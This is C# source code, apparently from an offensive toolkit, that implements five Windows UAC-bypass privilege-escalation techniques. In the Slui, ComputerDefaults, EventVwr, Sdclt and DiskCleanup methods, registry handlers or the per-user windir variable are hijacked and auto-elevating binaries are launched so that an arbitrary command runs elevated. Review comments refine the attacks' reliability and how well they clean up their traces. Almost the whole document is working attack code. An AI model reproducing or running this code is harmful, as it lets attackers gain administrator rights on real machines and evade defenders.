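public Slui(byte[] encodedCommand)
{
    // Credit: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
    //
    // Points the per-user "exefile" open handler (HKCU\Software\Classes\exefile\Shell\Open\command)
    // at the supplied command, launches slui.exe with the "runas" verb, waits a fixed grace period
    // and then removes the hijack again.
    //
    // Review fixes over the original:
    //  - cleanup now runs in a finally block. If Start() threw, the original left the handler in
    //    place, which presumably redirects every shell launch of an .exe by this user to the payload
    //    (a stability problem for the user and a durable artefact for defenders to find);
    //  - RegistryKey / Process handles are disposed instead of leaking the parent key handle;
    //  - the handler key is created and written in one step instead of create-then-reopen.
    //
    // encodedCommand: UTF-8 bytes of the command line to run.

    // UAC at 'Always Notify' defeats the technique; the AlwaysNotify constructor is assumed to
    // check for that and act on it itself -- TODO confirm, its result is never used here.
    new AlwaysNotify();

    string command = Encoding.UTF8.GetString(encodedCommand);

    const string handlerPath = @"Software\Classes\exefile\Shell\Open\command";
    const string hijackRoot = @"Software\Classes\exefile";

    // CreateSubKey opens (or creates) the key writable, creating intermediate keys as needed.
    using (RegistryKey handler = Registry.CurrentUser.CreateSubKey(handlerPath))
    {
        if (handler == null)
        {
            throw new InvalidOperationException("Could not open HKCU\\" + handlerPath + " for writing.");
        }
        handler.SetValue("", command);
    }

    try
    {
        using (Process launcher = new Process())
        {
            launcher.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            launcher.StartInfo.FileName = "C:\\windows\\system32\\slui.exe";
            launcher.StartInfo.Verb = "runas";
            // Verbs are only honoured when the shell performs the launch. That is the default on
            // .NET Framework (which the original relied on) but not on .NET Core / .NET 5+.
            launcher.StartInfo.UseShellExecute = true;
            launcher.Start();
        }

        // Fixed grace period (kept from the original) for the elevated side to resolve the handler
        // and start the payload. The launcher is not the payload process, so WaitForExit() on it
        // would not be a substitute.
        Thread.Sleep(10000);
    }
    finally
    {
        // Always remove the hijack, even if Start() threw. NOTE(review): like the original this
        // deletes the whole HKCU\Software\Classes\exefile tree, including anything that existed
        // there before this ran. throwOnMissingSubKey is false so cleanup cannot itself throw
        // merely because the key is already gone.
        Registry.CurrentUser.DeleteSubKeyTree(hijackRoot, false);
    }
}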
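public ComputerDefaults(byte[] encodedCommand)
{
    // Credit: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
    //
    // Same registry hijack as the credited fodhelper script, but the launcher is
    // ComputerDefaults.exe (the original's "start fodhelper" comment was stale):
    // HKCU\Software\Classes\ms-settings\Shell\Open\command is pointed at the supplied command,
    // an empty DelegateExecute value is written alongside it (part of the technique as credited;
    // keep it), ComputerDefaults.exe is started, and after a fixed grace period the hijack is removed.
    //
    // Review fixes over the original:
    //  - cleanup runs in a finally block, so a failed launch no longer leaves the ms-settings
    //    handler behind as a persistent artefact;
    //  - RegistryKey / Process handles are disposed instead of leaking the parent key handle;
    //  - the handler key is created and written in one step instead of create-then-reopen.
    //
    // encodedCommand: UTF-8 bytes of the command line to run.

    // UAC at 'Always Notify' defeats the technique; the AlwaysNotify constructor is assumed to
    // check for that and act on it itself -- TODO confirm, its result is never used here.
    new AlwaysNotify();

    string command = Encoding.UTF8.GetString(encodedCommand);

    const string handlerPath = @"Software\Classes\ms-settings\Shell\Open\command";
    const string hijackRoot = @"Software\Classes\ms-settings";

    using (RegistryKey handler = Registry.CurrentUser.CreateSubKey(handlerPath))
    {
        if (handler == null)
        {
            throw new InvalidOperationException("Could not open HKCU\\" + handlerPath + " for writing.");
        }
        handler.SetValue("DelegateExecute", "");
        handler.SetValue("", command);
    }

    try
    {
        using (Process launcher = new Process())
        {
            launcher.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            launcher.StartInfo.FileName = "C:\\windows\\system32\\ComputerDefaults.exe";
            launcher.Start();
        }

        // Fixed grace period (kept from the original) for the launcher to resolve the handler
        // and start the payload; the launcher is not the payload process.
        Thread.Sleep(10000);
    }
    finally
    {
        // Always remove the hijack, even if Start() threw. NOTE(review): like the original this
        // deletes the whole HKCU\Software\Classes\ms-settings tree, including anything that
        // existed there before this ran.
        Registry.CurrentUser.DeleteSubKeyTree(hijackRoot, false);
    }
}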
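public EventVwr(byte[] encodedCommand)
{
    // Credit: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    //
    // Points the per-user "mscfile" open handler (HKCU\Software\Classes\mscfile\Shell\Open\command)
    // at the supplied command, starts eventvwr.exe (the original's "start fodhelper" comment was
    // stale), waits a fixed grace period and then removes the hijack again.
    //
    // Review fixes over the original:
    //  - cleanup runs in a finally block, so a failed launch no longer leaves the mscfile handler
    //    behind (presumably affecting every .msc opened by this user, and a durable artefact);
    //  - RegistryKey / Process handles are disposed instead of leaking the parent key handle;
    //  - the handler key is created and written in one step instead of create-then-reopen.
    //
    // encodedCommand: UTF-8 bytes of the command line to run.

    // UAC at 'Always Notify' defeats the technique; the AlwaysNotify constructor is assumed to
    // check for that and act on it itself -- TODO confirm, its result is never used here.
    new AlwaysNotify();

    string command = Encoding.UTF8.GetString(encodedCommand);

    const string handlerPath = @"Software\Classes\mscfile\Shell\Open\command";
    const string hijackRoot = @"Software\Classes\mscfile";

    using (RegistryKey handler = Registry.CurrentUser.CreateSubKey(handlerPath))
    {
        if (handler == null)
        {
            throw new InvalidOperationException("Could not open HKCU\\" + handlerPath + " for writing.");
        }
        handler.SetValue("", command);
    }

    try
    {
        using (Process launcher = new Process())
        {
            launcher.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            launcher.StartInfo.FileName = "C:\\windows\\system32\\eventvwr.exe";
            launcher.Start();
        }

        // Fixed grace period (kept from the original) for the launcher to resolve the handler
        // and start the payload; the launcher is not the payload process.
        Thread.Sleep(10000);
    }
    finally
    {
        // Always remove the hijack, even if Start() threw. NOTE(review): like the original this
        // deletes the whole HKCU\Software\Classes\mscfile tree, including anything that existed
        // there before this ran.
        Registry.CurrentUser.DeleteSubKeyTree(hijackRoot, false);
    }
}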
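public Sdclt(byte[] encodedCommand)
{
    // Credit: http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
    //
    // Points the per-user "Folder" open handler (HKCU\Software\Classes\Folder\shell\open\command)
    // at the supplied command, writes an empty DelegateExecute value alongside it (part of the
    // technique as credited; keep it), starts sdclt.exe, waits a fixed grace period and then
    // removes the hijack again. The original author found this only works on Windows 10, so the
    // OS is checked first and the process exits otherwise.
    //
    // Review fixes over the original:
    //  - the OS-version lookup no longer dereferences a possibly-null key / value;
    //  - cleanup runs in a finally block, so a failed launch no longer leaves the Folder handler
    //    behind (presumably affecting folder opens for this user, and a durable artefact);
    //  - RegistryKey / Process handles are disposed instead of leaking the parent key handle;
    //  - the handler key is created and written in one step instead of create-then-reopen.
    //
    // encodedCommand: UTF-8 bytes of the command line to run.

    // UAC at 'Always Notify' defeats the technique; the AlwaysNotify constructor is assumed to
    // check for that and act on it itself -- TODO confirm, its result is never used here.
    new AlwaysNotify();

    string windowsVersion;
    using (RegistryKey osVersion = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows NT\CurrentVersion\"))
    {
        object productName = osVersion == null ? null : osVersion.GetValue("ProductName");
        windowsVersion = productName == null ? string.Empty : productName.ToString();
    }

    // NOTE(review): ProductName is a coarse check -- newer Windows releases reportedly still
    // carry a "Windows 10 ..." ProductName here, so this does not exclude them. Confirm this
    // matches the intended scope.
    if (!windowsVersion.Contains("Windows 10"))
    {
        System.Console.WriteLine("System is not Windows 10. This attack will fail. Exiting...");
        // Kept from the original: terminates the whole process rather than throwing.
        System.Environment.Exit(1);
    }

    string command = Encoding.UTF8.GetString(encodedCommand);

    const string handlerPath = @"Software\Classes\Folder\shell\open\command";
    const string hijackRoot = @"Software\Classes\Folder";

    using (RegistryKey handler = Registry.CurrentUser.CreateSubKey(handlerPath))
    {
        if (handler == null)
        {
            throw new InvalidOperationException("Could not open HKCU\\" + handlerPath + " for writing.");
        }
        handler.SetValue("", command);
        handler.SetValue("DelegateExecute", "");
    }

    try
    {
        using (Process launcher = new Process())
        {
            launcher.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            launcher.StartInfo.FileName = "C:\\windows\\system32\\sdclt.exe";
            launcher.Start();
        }

        // Fixed grace period (kept from the original) for the launcher to resolve the handler
        // and start the payload; the launcher is not the payload process.
        Thread.Sleep(10000);
    }
    finally
    {
        // Always remove the hijack, even if Start() threw. NOTE(review): like the original this
        // deletes the whole HKCU\Software\Classes\Folder tree, including any pre-existing
        // per-user Folder customisation -- worth checking for before running on a real user's profile.
        Registry.CurrentUser.DeleteSubKeyTree(hijackRoot, false);
    }
}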
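public DiskCleanup(byte[] encodedCommand)
{
    // Credit: https://github.com/gushmazuko/WinBypass/blob/master/DiskCleanupBypass_direct.ps1
    //
    // Sets a per-user "windir" environment variable (HKCU\Environment) to the supplied command,
    // runs the scheduled task \Microsoft\Windows\DiskCleanup\SilentCleanup through schtasks.exe,
    // waits a fixed grace period and then deletes the variable again. The caller's command must
    // end in "REM": per the original's own comment the trailing REM is what neutralises whatever
    // follows %windir% once the task's command line is expanded, so the original's
    // Contains("REM") test was weaker than what it claimed to check.
    //
    // Review fixes over the original:
    //  - the REM check now verifies the command actually ends in REM (trailing whitespace ignored);
    //  - cleanup runs in a finally block. A stale per-user "windir" presumably affects every later
    //    process of this user that resolves %windir% from the user environment, and it is a durable
    //    artefact; the original left it behind on any exception;
    //  - the Environment key is null-checked and disposed, and the Process handle is disposed.
    //
    // encodedCommand: UTF-8 bytes of the command line to run; must end in "REM".

    // UAC at 'Always Notify' defeats the technique; the AlwaysNotify constructor is assumed to
    // check for that and act on it itself -- TODO confirm, its result is never used here.
    new AlwaysNotify();

    string command = Encoding.UTF8.GetString(encodedCommand);

    if (!command.TrimEnd().EndsWith("REM", StringComparison.Ordinal))
    {
        Console.WriteLine("Command must end in REM. Exiting...");
        // Kept from the original: terminates the whole process rather than throwing.
        System.Environment.Exit(1);
    }

    using (RegistryKey userEnvironment = Registry.CurrentUser.OpenSubKey(@"Environment", true))
    {
        if (userEnvironment == null)
        {
            throw new InvalidOperationException("Could not open HKCU\\Environment for writing.");
        }

        userEnvironment.SetValue("windir", command);

        try
        {
            using (Process launcher = new Process())
            {
                launcher.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                launcher.StartInfo.FileName = "C:\\windows\\system32\\schtasks.exe";
                launcher.StartInfo.Arguments = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I";
                launcher.Start();
            }

            // Fixed grace period (kept from the original) for the task to start with the
            // hijacked variable; schtasks.exe is not the payload process, so WaitForExit() on it
            // would not be a substitute.
            Thread.Sleep(10000);
        }
        finally
        {
            // Always remove the variable, even if Start() threw. throwOnMissingValue is false so
            // cleanup cannot itself throw merely because the value is already gone.
            userEnvironment.DeleteValue("windir", false);
        }
    }
}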